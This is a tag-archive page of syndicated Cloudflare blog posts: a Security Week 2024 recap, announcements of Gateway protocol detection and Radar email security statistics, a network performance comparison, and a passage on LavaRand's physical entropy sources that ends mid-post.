Tag Archives: Security Week

Security Week 2024 wrap up

Post Syndicated from Daniele Molteni original https://blog.cloudflare.com/security-week-2024-wrap-up


The next 12 months have the potential to reshape the global political landscape with elections occurring in more than 80 nations, in 2024, while new technologies, such as AI, capture our imagination and pose new security challenges.

Against this backdrop, the role of CISOs has never been more important. Grant Bourzikas, Cloudflare’s Chief Security Officer, shared his views on what the biggest challenges currently facing the security industry are in the Security Week opening blog.

Over the past week, we announced a number of new products and features that align with what we believe are the most crucial challenges for CISOs around the globe. We released features that span Cloudflare’s product portfolio, ranging from application security to securing employees and cloud infrastructure. We have also published a few stories on how we take a Customer Zero approach to using Cloudflare services to manage security at Cloudflare.

We hope you find these stories interesting and are excited by the new Cloudflare products. In case you missed any of these announcements, here is a recap of Security Week:

Responding to opportunity and risk from AI

Title Excerpt
Cloudflare announces Firewall for AI Cloudflare announced the development of Firewall for AI, a protection layer that can be deployed in front of Large Language Models (LLMs) to identify abuses and attacks.
Defensive AI: Cloudflare’s framework for defending against next-gen threats Defensive AI is the framework Cloudflare uses when integrating intelligent systems into its solutions. Cloudflare’s AI models look at customer traffic patterns, providing that organization with a tailored defense strategy unique to their environment.
Cloudflare launches AI Assistant for Security Analytics We released a natural language assistant as part of Security Analytics. Now it is easier than ever to get powerful insights about your applications by exploring log and security events using the new natural language query interface.
Dispelling the Generative AI fear: how Cloudflare secures inboxes against AI-enhanced phishing Generative AI is being used by malicious actors to make phishing attacks much more convincing. Learn how Cloudflare’s email security systems are able to see past the deception using advanced machine learning models.

Maintaining visibility and control as applications and clouds change

Title Excerpt
Magic Cloud Networking simplifies security, connectivity, and management of public clouds Introducing Magic Cloud Networking, a new set of capabilities to visualize and automate cloud networks to give our customers easy, secure, and seamless connection to public cloud environments.
Secure your unprotected assets with Security Center: quick view for CISOs Security Center now includes new tools to address a common challenge: ensuring comprehensive deployment of Cloudflare products across your infrastructure. Gain precise insights into where and how to optimize your security posture.
Announcing two highly requested DLP enhancements: Optical Character Recognition (OCR) and Source Code Detections Cloudflare One now supports Optical Character Recognition and detects source code as part of its Data Loss Prevention service. These two features make it easier for organizations to protect their sensitive data and reduce the risks of breaches.
Introducing behavior-based user risk scoring in Cloudflare One We are introducing user risk scoring as part of Cloudflare One, a new set of capabilities to detect risk based on user behavior, so that you can improve security posture across your organization.
Eliminate VPN vulnerabilities with Cloudflare One The Cybersecurity & Infrastructure Security Agency issued an Emergency Directive due to the Ivanti Connect Secure and Policy Secure vulnerabilities. In this post, we discuss the threat actor tactics exploiting these vulnerabilities and how Cloudflare One can mitigate these risks.
Zero Trust WARP: tunneling with a MASQUE This blog discusses the introduction of MASQUE to Zero Trust WARP and how Cloudflare One customers will benefit from this modern protocol.
Collect all your cookies in one jar with Page Shield Cookie Monitor Protecting online privacy starts with knowing what cookies are used by your websites. Our client-side security solution, Page Shield, extends transparent monitoring to HTTP cookies.
Protocol detection with Cloudflare Gateway Cloudflare Secure Web Gateway now supports the detection, logging, and filtering of network protocols using packet payloads without the need for inspection.
Introducing Requests for Information (RFIs) and Priority Intelligence Requirements (PIRs) for threat intelligence teams Our Security Center now houses Requests for Information and Priority Intelligence Requirements. These features are available via API as well and Cloudforce One customers can start leveraging them today for enhanced security analysis.

Consolidating to drive down costs

Title Excerpt
Log Explorer: monitor security events without third-party storage With the combined power of Security Analytics and Log Explorer, security teams can analyze, investigate, and monitor logs natively within Cloudflare, reducing time to resolution and overall cost of ownership by eliminating the need of third-party logging systems.
Simpler migration from Netskope and Zscaler to Cloudflare: introducing Deskope and a Descaler partner update Cloudflare expands the Descaler program to Authorized Service Delivery Partners (ASDPs). Cloudflare is also launching Deskope, a new set of tooling to help migrate existing Netskope customers to Cloudflare One.
Protecting APIs with JWT Validation Cloudflare customers can now protect their APIs from broken authentication attacks by validating incoming JSON Web Tokens with API Gateway.
Simplifying how enterprises connect to Cloudflare with Express Cloudflare Network Interconnect Express Cloudflare Network Interconnect makes it fast and easy to connect your network to Cloudflare. Customers can now order Express CNIs directly from the Cloudflare dashboard.
Cloudflare treats SASE anxiety for VeloCloud customers The turbulence in the SASE market is driving many customers to seek help. We’re doing our part to help VeloCloud customers who are caught in the crosshairs of shifting strategies.
Free network flow monitoring for all enterprise customers Announcing a free version of Cloudflare’s network flow monitoring product, Magic Network Monitoring. Now available to all Enterprise customers.
Building secure websites: a guide to Cloudflare Pages and Turnstile Plugin Learn how to use Cloudflare Pages and Turnstile to deploy your website quickly and easily while protecting it from bots, without compromising user experience.
General availability for WAF Content Scanning for file malware protection Announcing the General Availability of WAF Content Scanning, protecting your web applications and APIs from malware by scanning files in-transit.

How can we help make the Internet better?

Title Excerpt
Cloudflare protects global democracy against threats from emerging technology during the 2024 voting season At Cloudflare, we’re actively supporting a range of players in the election space by providing security, performance, and reliability tools to help facilitate the democratic process.
Navigating the maze of Magecart: a cautionary tale of a Magecart impacted website Learn how a sophisticated Magecart attack was behind a campaign against e-commerce websites. This incident underscores the critical need for a strong client side security posture.
Cloudflare’s URL Scanner, new features, and the story of how we built it Discover the enhanced URL Scanner API, now integrated with the Security Center Investigate Portal. Enjoy unlisted scans, multi-device screenshots, and seamless integration with the Cloudflare ecosystem.
Changing the industry with CISA’s Secure by Design principles Security considerations should be an integral part of software’s design, not an afterthought. Explore how Cloudflare adheres to Cybersecurity & Infrastructure Security Agency’s Secure by Design principles to shift the industry.
The state of the post-quantum Internet Nearly two percent of all TLS 1.3 connections established with Cloudflare are secured with post-quantum cryptography. In this blog post we discuss where we are now in early 2024, what to expect for the coming years, and what you can do today.
Advanced DNS Protection: mitigating sophisticated DNS DDoS attacks Introducing the Advanced DNS Protection system, a robust defense mechanism designed to protect against the most sophisticated DNS-based DDoS attacks.

Sharing the Cloudflare way

Title Excerpt
Linux kernel security tunables everyone should consider adopting This post illustrates some of the Linux kernel features that are helping Cloudflare keep its production systems more secure. We do a deep dive into how they work and why you should consider enabling them.
Securing Cloudflare with Cloudflare: a Zero Trust journey A deep dive into how we have deployed Zero Trust at Cloudflare while maintaining user privacy.
Network performance update: Security Week 2024 Cloudflare is the fastest provider for 95th percentile connection time in 44% of networks around the world. We dig into the data and talk about how we do it.
Harnessing chaos in Cloudflare offices This blog discusses the new sources of “chaos” that have been added to LavaRand and how you can make use of that harnessed chaos in your next application.
Launching email security insights on Cloudflare Radar The new Email Security section on Cloudflare Radar provides insights into the latest trends around threats found in malicious email, sources of spam and malicious email, and the adoption of technologies designed to prevent abuse of email.

A final word

Thanks for joining us this week, and stay tuned for our next Innovation Week in early April, focused on the developer community.

Protocol detection with Cloudflare Gateway

Post Syndicated from Ankur Aggarwal original https://blog.cloudflare.com/gatway-protocol-detection


Cloudflare Gateway, our secure web gateway (SWG), now supports the detection, logging, and filtering of network protocols regardless of their source or destination port. Protocol detection makes it easier to set precise policies without having to rely on the well known port and without the risk of over/under-filtering activity that could disrupt your users’ work. For example, you can filter all SSH traffic on your network by simply choosing the protocol.

Today, protocol detection is available to any Enterprise user of Gateway and supports a growing list of protocols including HTTP, HTTPS, SSH, TLS, DCE/RPC, MQTT, and TPKT.

Why is this needed?

As many configuration planes move to using RESTful APIs, and now even GraphQL, there is still a need to manage devices via protocols like SSH. Whether it is the only management protocol available on a new third party device, or one of the first ways we learned to connect to and manage a server, SSH is still extensively used.

With other legacy SWG and firewall tools, the process of blocking traffic by specifying only the well known port number (for example, port 22 for SSH) can be both insecure and inconvenient. For example, if you used SSH over any other port it would not be filtered properly, or if you tried using another protocol over a well known port, such as port 22, it would be blocked. An argument could also be made to lock down the destinations to only allow incoming connections over certain ports, but companies don’t often control their destination devices.

With so many steps, there are risks of over-blocking legitimate traffic, which potentially prevents users from reaching the resources they need to stay productive and leads to a large volume of support tickets for your administrators. Alternatively, you could underblock and miss out on filtering your intended traffic, creating security risks for your organization.

How we built it

To build a performant protocol detection and filtering capability we had to make sure it could be applied in the same place Gateway policies are being applied. To meet this requirement we added a new TCP socket pre-read hook to OXY, our Rust-based policy framework, to buffer the first few bytes of the data stream. This buffer, then, allows Gateway to compare the bytes to our protocol signature database and apply the correct next step. And since this is all built into OXY, if the policy is set to Block, the connection will be closed; if it’s set to Allow, the connection will be proxied or progressed to establish the TLS session.

How to set up Gateway protocol filtering

Cloudflare Gateway’s protocol detection simplifies this process by allowing you to specify the protocol within a Gateway Network policy. To get started navigate to the Settings section on the Zero Trust dashboard and then select the Network tile. Under the Firewall section you’ll see a toggle for protocol detection and once enabled you’ll be able to create network policies.

Next, go to the Firewall Policies section of your Zero Trust Gateway dashboard and then click ‘+ Add a policy’. There you can create a policy such as the one below to block SSH for all users within the Sales department.

This will prevent members of the sales team from initiating an outgoing or incoming SSH session.

Get started

Customers with a Cloudflare One Enterprise account will find this functionality in their Gateway dashboard today. We plan to make it available to Pay-as-you-go and Free customer accounts soon, as well as expanding the list of protocols.

If you’re interested in using protocol detection or ready to explore more broadly how Cloudflare can help you modernize your security, request a workshop or contact your account manager.

Launching email security insights on Cloudflare Radar

Post Syndicated from David Belson original https://blog.cloudflare.com/email-security-insights-on-cloudflare-radar


During 2021’s Birthday Week, we announced our Email Routing service, which allows users to direct different types of email messages (such as marketing, transactional, or administrative) to separate accounts based on criteria such as the recipient’s address or department. Its capabilities and the volume of messages routed have grown significantly since launch.

Just a few months later, on February 23, 2022, we announced our intent to acquire Area 1 Security to protect users from phishing attacks in email, web, and network environments. Since the completion of the acquisition on April 1, 2022, Area 1’s email security capabilities have been integrated into Cloudflare’s secure access service edge (SASE) solution portfolio, and now processes tens of millions of messages daily.

Processing millions of email messages each day on behalf of our customers gives us a unique perspective on the threats posed by malicious emails, spam volume, the adoption of email authentication methods like SPF, DMARC, and DKIM, and the use of IPv4/IPv6 and TLS by email servers. Today, we are launching a new Email Security section on Cloudflare Radar to share these perspectives with you. The insights in this new section can help you better understand the state of email security as viewed across various metrics, as well as understanding real-time trends in email-borne threats. (For instance, correlating an observed increase within your organization in messages containing malicious links with a similar increase observed by Cloudflare.) Below, we review the new metrics that are now available on Radar.

Tracking malicious email

As Cloudflare’s email security service processes email messages on behalf of customers, we are able to identify and classify offending messages as malicious. As examples, malicious emails may attempt to trick recipients into sharing personal information like login details, or the messages could attempt to spread malware through embedded images, links, or attachments. The new Email Security section on Cloudflare Radar now provides insight at a global level into the aggregate share of processed messages that we have classified as malicious over the selected timeframe. During February 2024, as shown in the figure below, we found that an average of 2.1% of messages were classified as being malicious. Spikes in malicious email volume were seen on February 10 and 11, accounting for as much as 29% of messages. These spikes occurred just ahead of the Super Bowl, in line with previous observations of increases in malicious email volume in the week ahead of the game. Other notable (but lower) spikes were seen on February 13, 15, 17, 24, and 25. The summary and time series data for malicious email share are available through the Radar API.

Threat categorization

The Cloudflare Radar 2023 Year in Review highlighted some of the techniques used by attackers when carrying out attacks using malicious email messages. As noted above, these can include links or attachments leading to malware, as well as approaches like identity deception, where the message appears to be coming from a trusted contact, and brand impersonation, where the message appears to be coming from a trusted brand. In analyzing malicious email messages, Cloudflare’s email security service categorizes the threats that it finds these messages contain. (Note that a single message can contain multiple types of threats — the sender could be impersonating a trusted contact while the body of the email contains a link leading to a fake login page.)

Based on these assessments, Cloudflare Radar now provides insights into trends observed across several different groups of threat types including “Attachment”, “Link”, “Impersonation”, and “Other”. “Attachment” groups individual threat types where the attacker has attached a file to the email message, “Link” groups individual threat types where the attacker is trying to get the user to click on something, and “Impersonation” groups individual threat types where the attacker is impersonating a trusted brand or contact. The “Other” grouping includes other threat types not covered by the previous three.

During February 2024 for the “Link” grouping, as the figure below illustrates, link-based threats were unsurprisingly the most common, and were found in 58% of malicious emails. Since the display text for a link (i.e., hypertext) in HTML can be arbitrarily set, attackers can make a URL appear as if it links to a benign site when, in fact, it is actually malicious. Nearly a third of malicious emails linked to something designed to harvest user credentials. The summary and time series data for these threat categories are available through the Radar API.

For the “Attachment” grouping, during February 2024, nearly 13% of messages were found to have a malicious attachment that when opened or executed in the context of an attack, includes a call-to-action (e.g. lures target to click a link) or performs a series of actions set by an attacker. The share spiked several times throughout the month, reaching as high as 70%. The attachments in nearly 6% of messages attempted to download additional software (presumably malware) once opened.

If an email message appears to be coming from a trusted brand, users may be more likely to open it and take action, like checking the shipping status of a package or reviewing a financial transaction. During February 2024, on average, over a quarter of malicious emails were sent by attackers attempting to impersonate well-known brands. Similar to other threat categories, this one also saw a number of significant spikes, reaching as high as 88% of February 17. Just over 18% of messages were found to be trying to extort users in some fashion. It appears that such campaigns were very active in the week ahead of Valentine’s Day (February 14), although the peak was seen on February 15, at over 95% of messages.

Identity deception occurs when an attacker or someone with malicious intent sends an email claiming to be someone else, whether through use of a similar-looking domain or display name manipulation. This was the top threat category for the “Other” grouping, seen in over 36% of malicious emails during February 2024. The figure below shows three apparent “waves” of the use of this technique — the first began at the start of the month, the second around February 9, and the third around February 20. Over 11% of messages were categorized as malicious because of the reputation of the network (autonomous system) that they were sent from; some network providers are well-known sources of malicious and unwanted email.

Dangerous domains

Top-level domains, also known as TLDs, are found in the right-most portion of a hostname. For example, radar.cloudflare.com is in the .com generic Top Level Domain (gTLD), while bbc.co.uk is in the .uk country code Top Level Domain (ccTLD). As of February 2024, there are nearly 1600 Top Level Domains listed in the IANA Root Zone Database. Over the last 15 years or so, several reports have been published that look at the “most dangerous TLDs” — that is, which TLDs are most favored by threat actors. The “top” TLDs in these reports are often a mix of ccTLDs from smaller counties and newer gTLDs. On Radar, we are now sharing our own perspective on these dangerous TLDs, highlighting those where we have observed the largest shares of malicious and spam emails. The analysis is based on the sending domain’s TLD, found in the From: header of an email message. For example, if a message came from [email protected], then example.com is the sending domain, and .com is the associated TLD.

On Radar, users can view shares of spam and malicious email, and can also filter by timeframe and “type” of TLD, with options to view all (the complete list), ccTLDs (country codes), or “classic” TLDs (the original set of gTLDs specified in RFC 1591). Note that spam percentages shown here may be lower than those published in other industry analyses. Cloudflare cloud email security customers may be performing initial spam filtering before messages arrive at Cloudflare for processing, resulting in a lower percentage of messages characterized as spam by Cloudflare.

Looking back across February 2024, we found that new gTLD associates and the ccTLD zw (Zimbabwe) were the TLDs with domains originating the largest shares of malicious email, at over 85% each. New TLDs academy, directory, and bar had the largest shares of spam in email sent by associated domains, at upwards of 95%.

TLDs with the highest percentage of malicious email in February 2024
TLDs with the highest percentage of spam email in February 2024

The figure below breaks out ccTLDs, where we found that at least half of the messages coming from domains in zw (Zimbabwe, at 85%) and bd (Bangladesh, at 50%) were classified as malicious. While the share of malicious email vastly outweighed the share of spam seen from zw domains, it was much more balanced in bd and pw (Palau). A total of 80 ccTLDs saw fewer than 1% of messages classified as malicious in February 2024.

ccTLDs with the highest percentage of malicious email in February 2024

Among the “classic” TLDs, we can see that the shares of both malicious emails and spam are relatively low. Perhaps unsurprisingly, as the largest TLD, com has the largest shares of both in February 2024. Given the restrictions around registering int and gov domains, it is interesting to see that even 2% of the messages from associated domains are classified as malicious.

Classic TLDs with the highest percentage of malicious email in February 2024.

The reasons that some TLDs are responsible for a greater share of malicious and/or spam email vary — some may have loose or non-existent registration requirements, some may be more friendly to so-called “domain tasting”, and some may have particularly low domain registration fees.The malicious and spam summary shares per TLD are available through the Radar API.

Adoption of email authentication methods

SPF, DKIM, and DMARC are three email authentication methods and when used together, they help prevent spammers, phishers, and other unauthorized parties from sending emails on behalf of a domain they do not own.

Sender Policy Framework (SPF) is a way for a domain to list all the servers they send emails from, with SPF records in the DNS listing the IP addresses of all the servers that are allowed to send emails from the domain. Mail servers that receive an email message can check it against the SPF record before passing it on to the recipient’s inbox. DomainKeys Identified Mail (DKIM) enables domain owners to automatically “sign” emails from their domain with a digital “signature” that uses cryptography to mathematically verify that the email came from the domain. Domain-based Message Authentication Reporting and Conformance (DMARC) tells a receiving email server what to do, given the results after checking SPF and DKIM. A domain’s DMARC policy, stored in DMARC records, can be set in a variety of ways, instructing mail servers to quarantine emails that fail SPF or DKIM (or both), to reject such emails, or to deliver them.

These authentication methods have recently taken on increased importance, as both Google and Yahoo! have announced that during the first quarter of 2024, as part of a more aggressive effort to reduce spam, they will require bulk senders to follow best practices that include implementing stronger email authentication using standards like SPF, DKIM, and DMARC. When a given email message is evaluated against these three methods, the potential outcomes are PASS, FAIL, and NONE. The first two are self-explanatory, while NONE means that there was no associated SPF/DKIM/DMARC policy associated with the message’s sending domain.

Reviewing the average shares across February 2024, we find that over 93% of messages passed SPF authentication, while just 2.7% failed. When considering this metric, FAIL is the outcome of greater interest because SPF is easier to spoof than DKIM, and also because failure may be driven by “shadow IT” situations, such as when a company’s Marketing department uses a third party to send email on behalf of the company, but fails to add that third party to the associated SPF records. An average of 88.5% of messages passed DKIM evaluation in February, while just 2.1% failed. For DKIM, the focus should be on PASS, as there are potential non-malicious reasons that a given signature may fail to verify. For DMARC, 86.5% of messages passed authentication, while 4.2% failed, and the combination of PASS and FAIL is the focus, as the presence of an associated policy is of greatest interest for this metric, and whether the message passed or failed less so. For all three methods in this section, NONE indicates the lack of an associated policy. SPF (summary, time series), DKIM (summary, time series), and DMARC (summary, time series) data is available through the Radar API.

Protocol usage

Cloudflare has long evangelized IPv6 adoption, although it has largely been focused on making Web resources available via this not-so-new version of the protocol. However, it’s also important that other Internet services begin to support and use IPv6, and this is an area where our recent research shows that providers may be lacking.

Through analysis of inbound connections from senders’ mail servers to Cloudflare’s email servers, we can gain insight into the distribution of these connections across IPv4 and IPv6. Looking at this distribution for February 2024, we find that 95% of connections were made over IPv4, while only 5% used IPv6. This distribution is in sharp contrast to the share of IPv6 requests for IPv6-capable (dual stacked) Web content, which was 37% for the same time period. The summary and time series data for IPv4/v6 distribution are available through the Radar API.

Cloudflare has also been a long-time advocate for secure connections, launching Universal SSL during 2014’s Birthday Week, to enable secure connections between end users and Cloudflare for all of our customers’ sites (which numbered ~2 million at the time). Over the last 10 years, SSL has completed its evolution to TLS, and although many think of TLS as only being relevant for Web content, possibly due to years of being told to look for the 🔒 padlock in our browser’s address bar, TLS is also used to encrypt client/server connections across other protocols including SMTP (email), FTP (file transfer), and XMPP (messaging).

Similar to the IPv4/v6 analysis discussed above, we can also calculate the share of inbound connections to Cloudflare’s email servers that are using TLS. Messages are encrypted in transit when the connection is made over TLS, while messages sent over unencrypted connections can potentially be read or modified in transit. Fortunately, the vast majority of messages received by Cloudflare’s email servers are made over encrypted connections, with just 6% sent unencrypted during February 2024. The summary and time series data for TLS usage are available through the Radar API.

Conclusion

Although younger Internet users may eschew email in favor of communicating through a variety of messaging apps, email remains an absolutely essential Internet service, relied on by individuals, enterprises, online and offline retailers, governments, and more. However, because email is so ubiquitous, important, and inexpensive, it has also become an attractive threat vector. Cloudflare’s email routing and security services help customers manage and secure their email, and Cloudflare Radar’s new Email Security section can help security researchers, email administrators, and other interested parties understand the latest trends around threats found in malicious email, sources of spam and malicious email, and the adoption of technologies designed to prevent abuse of email.

If you have any questions about this new section, you can contact the Cloudflare Radar team at [email protected] or on social media at @CloudflareRadar (X/Twitter), cloudflare.social/@radar (Mastodon), and radar.cloudflare.com (Bluesky).

Tune in for more news, announcements and thought-provoking discussions! Don’t miss the full Security Week hub page.

Network performance update: Security Week 2024

Post Syndicated from David Tuber original https://blog.cloudflare.com/network-performance-update-security-week-2024


We constantly measure our own network’s performance against other networks, look for ways to improve our performance compared to them, and share the results of our efforts. Since June 2021, we’ve been sharing benchmarking results we’ve run against other networks to see how we compare.

In this post we are going to share the most recent updates since our last post in September, and talk about how we are getting as fast as we are.

How we stack up

Since June 2021, we’ve been taking a close look at the most reported eyeball-facing ISPs and taking actions for the specific networks where we have some room for improvement. Cloudflare was already the fastest provider for TCP Connection time at the 95th percentile for 44% of the networks around the world (we define a network as country and AS number pair). We chose this metric to show how our network helps make your websites faster by getting you to where your customers are. Taking a look at the numbers, in July 2022, Cloudflare was ranked #1 in 33% of the networks and was within 2 ms (95th percentile TCP Connection Time) or 5% of the #1 provider for 8% of the networks that we measured. For reference, our closest competitor was the fastest for 20% of networks.

As of August 30, 2023, Cloudflare was the fastest provider for 44% of networks — and was within 2 ms (95th percentile TCP Connection Time) or 5% of the fastest provider for 10% of the networks that we measured—whereas our closest competitor (Amazon Cloudfront) was the fastest for 19% of networks. As of February 15, 2024, we are still #1 in 44% of networks for 95th percentile TCP Connection Time. Let’s dig into the data.

Lightning fast

Looking at 95th percentile TCP connect times from November 18, 2023, to February 15, 2024, Cloudflare is the #1 provider in 44% of the top 1000 networks:

Our P95 TCP Connection time has been trending down since November, and we are consistently 50ms faster at P95 than our closest competitor (Amazon CloudFront):

Connect time comparisons between providers at 50th and 95th percentile
P50 Connect (ms) P95 Connect (ms)
Cloudflare 130 579
Amazon 145 637
Google 190 772
Akamai 195 774
Fastly 189 734

These graphs show that day over day, Cloudflare was consistently the fastest provider. They also show the gaps between Cloudflare and the other competitors.  When you look at the 95th percentile, Cloudflare is almost 200ms faster than Akamai across the world for connect times. This shows that our network reaches more places and allows users to get their content faster than Akamai on a consistent basis.

When we aggregate this data over the whole time period, Cloudflare is the fastest in the most networks. For that whole time span of November 18, 2023, to February 15, 2024, Cloudflare was number 1 in 73% of networks for mean TCP connection time:

Looking at a map plotting by 95th percentile TCP connect time, Cloudflare is the fastest in the most countries, and you can see this by the fact that most of the map is orange:

For comparison, here’s what the map looked like in September 2023:

These numbers show that we’re reducing the overall TCP connection time around the world while simultaneously staying ahead of the competition. Let’s talk about how we get these numbers and what we’re doing to make you even faster.

Measuring What Matters

As a quick reminder, here’s how we get the data for our measurements: when users receive a Cloudflare-branded error page, we use Real User Measurements (RUM) and fetch a small file from Cloudflare, Akamai, Amazon CloudFront, Fastly, and Google Cloud CDN. Browsers around the world report the performance of those providers from the perspective of the end-user network they are on. The goal is to provide an accurate picture of where different providers are faster, and more importantly, where Cloudflare can improve. You can read more about the methodology in the original Speed Week blog post.

Using the RUM data, we measure various performance metrics, such as TCP Connection Time, Time to First Byte (TTFB), and Time to Last Byte (TTLB), for ourselves and other providers.

If we only collect data from a browser when we return an error page, you could see how variable the data can get: if one network or website is having a problem in a certain country, that country could overreport, meaning those networks would be more highly weighted in the calculations because more users reported from that network during a given time period.

For example, if a lot of users connecting over a small Brazilian network were generating reports because their websites were throwing errors more frequently, that could make this small network look a lot bigger to us. This small network in Brazil could have as many reports as Claro, a major network in the region, despite them being totally different when you look at the number of subscribers.  If we only look at the networks that report to us the most, it could cause smaller networks with fewer subscribers to be treated as more important because of point-in-time error conditions.

This phenomenon could cause the networks we look at to change week over week. Going back to the Brazil example, if the website that was throwing a bunch of errors fixed their problem, and we no longer saw measurements from that network, they may not show up as a “most reported network” depending on when we look at the data. This means that the networks we look at to consider where we are fastest are dependent on which networks are sending us the most reports at any given time, which is not optimal if we’re trying to get faster in these networks. We need to be able to get a consistent signal on these networks to understand where we’re faster and where we’re not.

We’ve addressed this issue by creating a fixed list of the networks we want to look at. We did this by looking at public stats on user population by network and then comparing that with our sample sizes by network until we identified the 1000 networks we want to examine.  This ensures that day over day, the networks we look at are the same.

Now let’s talk about what makes us faster in more places than other networks: HTTP/3.

Blazing fast speeds with HTTP/3

One reason why Cloudflare is the fastest in the most networks is because we’ve been leading the charge with adoption and usage of HTTP/3 on our platform.  HTTP/3 allows for faster connectivity behavior which means we can get connections established faster and get data flowing. HTTP/3 is currently used by around 31% of Internet traffic:

To show that HTTP/3 improves connection times, we looked at two different Cloudflare endpoints that these tests ran against: one with HTTP/3 enabled and one with HTTP/3 disabled. The performance difference between the two is night and day.  Here’s a table showing the performance difference for 95th percentile connect time between Cloudflare zones when one zone has HTTP/3 enabled:

P50 connect (ms) P95 connect (ms)
Cloudflare HTTP/3 130 579
Cloudflare non-HTTP/3 174 695

At P95, Cloudflare is 116 ms faster for connection times when HTTP/3 is enabled. This performance gain helps us be the fastest in the most networks.

But why does HTTP/3 help make us faster? HTTP/3 allows for faster connection setup times, which lets us take greater advantage of our global network footprint to be the fastest in the most networks. HTTP/3 is built on top of the QUIC protocol, which multiplexes UDP packets to allow for parallel streams to be sent at the same time. This means that TLS encryption can happen in parallel with connection establishment, shortening the amount of time that is needed to set up a secure connection. Paired with Cloudflare’s network that is incredibly close to end-users, this makes for significant latency reductions on user Connect times. All major browsers have HTTP/3 enabled by default, so you too can realize these latency improvements by enabling HTTP/3 on your website today.

What’s next

We’re sharing our updates on our journey to become #1 everywhere so that you can see what goes into running the fastest network in the world. From here, our plan is the same as always: identify where we’re slower, fix it, and then tell you how we’ve gotten faster.

Harnessing chaos in Cloudflare offices

Post Syndicated from Cefan Daniel Rubin original https://blog.cloudflare.com/harnessing-office-chaos


In the children’s book The Snail and Whale, after an unexpectedly far-flung adventure, the principal character returns to declarations of “How time’s flown” and “Haven’t you grown?” It has been about four years since we last wrote about LavaRand and during that time the story of how Cloudflare uses physical sources of entropy to add to the security of the Internet has continued to travel and be a source of interest to many. What was initially just a single species of physical entropy source – lava lamps – has grown and diversified. We want to catch you up a little on the story of LavaRand. This blog post will cover the new sources of “chaos” that have been added to LavaRand and how you can make use of that harnessed chaos in your next application. We’ll cover how public randomness can open up uses of publicly trusted randomness — imagine not needing to take the holders of a “random draw” at their word when they claim the outcome is not manipulated in some way. And finally we’ll discuss timelock encryption which is a way to ensure that a message cannot be decrypted until some chosen time in the future.

LavaRand origins

The entropy sourced from our wall of lava lamps in San Francisco has long played its part in the randomness that secures connections made through Cloudflare.

Lava lamps with flowing wax.

Cloudflare’s servers collectively handle upwards of 55 million HTTP requests per second, the vast majority of which are secured via the TLS protocol to ensure authenticity and confidentiality. Under the hood, cryptographic protocols like TLS require an underlying source of secure randomness – otherwise, the security guarantees fall apart.

Secure randomness used in cryptography needs to be computationally indistinguishable from “true” randomness. For this, it must both pass statistical randomness tests, and the output needs to be unpredictable to any computationally-bounded adversary, no matter how much previous output they’ve already seen. The typical way to achieve this is to take some random ‘seed’ and feed it into a Cryptographically Secure Pseudorandom Number Generator (CSPRNG) that can produce an essentially-endless stream of unpredictable bytes upon request. The properties of a CSPRNG ensure that all outputs are practically indistinguishable from truly random outputs to anyone that does not know its internal state. However, this all depends on having a secure random seed to begin with. Take a look at this blog for more details on true randomness versus pseudorandomness, and this blog for some great examples of what can go wrong with insecure randomness.

For many years, Cloudflare’s servers relied on local sources of entropy (such as the precise timing of packet arrivals or keyboard events) to seed their entropy pools. While there’s no reason to believe that the local entropy sources on those servers are insecure or could be easily compromised, we wanted to hedge our bets against that possibility. Our solution was to set up a system where our servers could periodically refresh their entropy pools with true randomness from an external source.

That brings us to LavaRand. “Lavarand” has long been the name given to systems used for the generation of randomness (first by Silicon Graphics in 1997). Cloudflare launched its instantiation of a LavaRand system in 2017 as a system that collects entropy from the wall of lava lamps in our San Francisco office and makes it available via an internal API. Our servers then periodically query the API to retrieve fresh randomness from LavaRand and incorporate it into their entropy pools. The contributions made by LavaRand can be considered spice added to the entropy pool mix! (For more technical details, read our previous blog post.)

Lava lamps in Cloudflare’s San Francisco office.

Adding to the office chaos

Our lava lamps in San Francisco have been working tirelessly for years to supply fresh entropy to our systems, but they now have siblings across the world to help with their task! As Cloudflare has grown, so has the variety of entropy sources found in and sourced from our offices. Cloudflare’s Places team works hard to ensure that our offices reflect aspects of our values and culture. Several of our larger office locations include installations of physical systems of entropy, and it is these installations that we have worked to incorporate into LavaRand over time. The tangible and exciting draw of these systems is their basis in physical mechanics that we intuitively consider random. The gloops of warmed ascending “lava” floating past cooler sinking blobs within lava lamps attract our attention just as other unpredictable (and often beautiful) dynamic systems capture our interest.

London’s unpredictable pendulums

Visible to visitors of our London office is a wall of double pendulums whose beautiful swings translate to another source of entropy to LavaRand and to the pool of randomness that Cloudflare’s servers pull from.

Close-up of double pendulum display in Cloudflare’s London office.

To the untrained eye the shadows of the pendulum stands and those cast by the rotating arms on the rear wall might seem chaotic. If so, then this installation should be labeled a success! Different light conditions and those shadows add to the chaos that is captured from this entropy source.

Double pendulum display in Cloudflare’s London office with changing light conditions.

Indeed, even with these arms restricted to motion in two dimensions, the path traced by the arms is mesmerizingly varied, and can be shown to be mathematically chaotic. Even if we forget air resistance, temperature, and the environment, and then assume that the mutation is completely deterministic, still the resulting long-term motion is hard to predict. In particular the system is very sensitive to initial conditions, this initial state – how they are set in motion – paired with deterministic behavior produces a unique path that is traced until the pendulum comes to rest, and the system is set in motion by a Cloudflare employee in London once again.

Austin’s mesmerizing mobiles

The beautiful new Cloudflare office in Austin, Texas recently celebrated its first year since opening. This office contributes its own spin on physical entropy: suspended above the entrance of the Cloudflare office in downtown Austin is an installation of translucent rainbow mobiles. These twirl, reflecting the changing light, and cast coloured patterns on the enclosing walls. The display of hanging mobiles and their shadows are very sensitive to a physical environment which includes the opening and closing of doors, HVAC changes, and ambient light. This chaotic system’s mesmerizing and changing scene is captured periodically and fed into the stream of LavaRand randomness.

Hanging rainbow mobiles in Cloudflare’s Austin office.

Mixing new sources into LavaRand

We incorporated the new sources of office chaos into the LavaRand system (still called LavaRand despite including much more than lava lamps) in the same way as the existing lava lamps, which we’ve previously described in detail.

To recap, at repeated intervals, a camera captures an image of the current state of the randomness display. Since the underlying system is truly random, the produced image contains true randomness. Even shadows and changing light conditions play a part in producing something unique and unpredictable! There is another secret that we should share: at a base level, image sensors in the real world are often a source of sufficient noise that even images taken without the lens cap removed could work well as a source of entropy! We consider this added noise to be a serendipitous addition to the beautiful chaotic motion of these installations.

Close-up of hanging rainbow mobiles in Cloudflare’s Austin office.

Once we have a still image that captures the state of the randomness display at a particular point in time, we compute a compact representation – a hash – of the image to derive a fixed-sized output of truly random bytes.

Process of converting physical entropy displays into random byte strings.

